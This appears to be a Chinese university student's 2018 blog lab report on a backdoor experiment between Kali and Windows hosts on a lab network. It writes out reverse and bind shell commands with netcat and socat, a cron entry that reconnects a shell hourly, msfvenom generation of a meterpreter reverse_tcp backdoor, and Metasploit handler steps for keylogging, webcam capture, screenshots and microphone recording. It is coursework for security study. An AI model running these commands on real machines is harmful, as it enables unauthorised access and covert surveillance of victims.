Exp2 后门原理与实践 20154328 常城

目录

  • 实践内容
  • 实践过程
  • netcat
  • 基础问题回答
  • 实验心得体会

正文

实践内容

  • 使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。
  • 详情见实验指导书

实践过程

netcat获取主机操作Shell,cron启动

windows获得linux的shell

  • windows平台下利用cmd的ipconfig命令查看到本机的ip地址为172.30.6.27

  • kali在终端下使用ifconfig命令查看kali的IP地址为172.30.6.69

  • windows下使用ncat.exe -l -p 4328命令运行ncat.exe监听4328端口。

  • kali下使用为nc 172.30.6.27(即主机ip) 4328 -e /bin/sh命令连接windows的4328端口

  • 连接成功后,我们就可以在windows主机获取kali的信息,如输入ls命令:

linux获得windows的shell

  • kali下使用nc -l -p 4328命令监听4328端口

  • windows下使用ncat.exe -e cmd.exe 172.30.6.69 4328(即kali的IP地址)连接kali的4328端口。

  • 连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell

使用netcat传输数据

  • windows下使用ncat.exe -l -p 4328命令运行ncat.exe监听4328端口。

  • kali下使用为nc 172.30.6.27(即主机ip) 4328命令连接windows的4328端口

  • 建立连接后,尝试传输

cron启动

  • windows下使用ncat.exe -l -p 4328命令运行ncat.exe监听4328端口

  • kali下使用crontab -e命令,设置一条定时指令,设置成在每小时的第35分钟反向连接windows主机的4328端口

  • 35 * * * * /bin/netcat 172.30.6.204 4327 -e /bin/sh

    (不好意思忘记截图了)

-35分时连接成功,成功获得linux的shell,输入ls指令查看。

socat获取主机操作Shell, 任务计划启动

  • windows下在控制面板->管理工具->任务计划程序中新建一个触发器

  • 再新建一个操作,程序路径选择socat.exe的安装路径,填写参数tcp-listen:4328 exec:cmd.exe,pty,stderr

  • 待重启后,刷新任务,可看到任务已经开始执行

  • kali下使用socat - tcp:172.30.6.204(即主机ip):4327(端口),此时已成功获取windows的shell。

msf-meterpreter 生成后门,传输到靶机获取shell

  • 在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.3.69 LPORT=4328 -f exe > 20154328.exe 生成一个名为20154328的后门程序


    (不好意思,图片没有截好)

  • 使用netcat将这个后门程序传输到windows主机上。在windows下输入ncat.exe -lv 4328 > 20154328.exe

  • 随后在Linux下使用ncat -nv 172.30.6.27 4328 < 20154328.exe命令把文件传送过去

  • 这里在关闭防火墙和杀毒软件 后运行。

使用msf获取目标摄像头,进行录屏、键盘记录等操作

  • 首先msf打开监听进程

  • msfconsole //进入msf

  • use exploit/multi/handler //进入handler模式

  • set payload windows/meterpreter/reverse_tcp //设置payload

  • set LHOST 172.30.6.69 //将LHOST设置为LinuxIP地址

  • set LPORT 4328 //设端口为那个4328

  • exploit //MSF开始监听

查看获取键盘输入、截获摄像头、获取截图、录音

  • 键盘记录

  • 打开摄像头

  • 截屏

  • record_mic // 截获音频

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    答:木马、操作系统自留的后门,以及通过灰鸽子文件进行。

  2. 例举你知道的后门如何启动起来(win及linux)的方式?

    答:通过开机自己启动,或者捆绑在软件上,打开软件的时候后门启动。

  3. Meterpreter有哪些给你映像深刻的功能?

    答:截屏,录像,以及键盘按键记录。感觉自己的一切都被陌生人观看,记录,自己的密码,以及所有的东西都会被别人看到。没有任何隐私可言。

  4. 如何发现自己有系统有没有被安装后门?

    答 :利用相关工具进行扫描,查看是否有很奇怪的开机自启项目。

实验感想

  • 通过这次实验了解了很多关于互联网的知识,这次的实验也显得很有趣。让我体会到了网络攻防的乐趣。体验了一次小黑客的瘾。
  • 这次实验也让人感到害怕,在互联网下没人有隐私可言。我们的一举一动可能都在别人的监视之下。以前看《数字城堡》这本书中看到他们通过插件记录键盘的使用情况来破解电脑的密码觉得很神奇,这次自己做出来后有些激动。
  • 这次实验也了解了黑客技术的可怕,在平时上网的时候要规范自己的行为规范。不认识的链接坚决不打开,提高自己的互联网安全意识。
  • 通过这次实验感觉到了互联网的安全任重而道远。我们只是学了一点点皮毛就可以入侵到别人的电脑中,而那些懂得很多技术的人员,如果不加约束互联网世界将一片混乱。
posted @ 2018-03-29 21:43  20154328常城  阅读(103)  评论(0编辑  收藏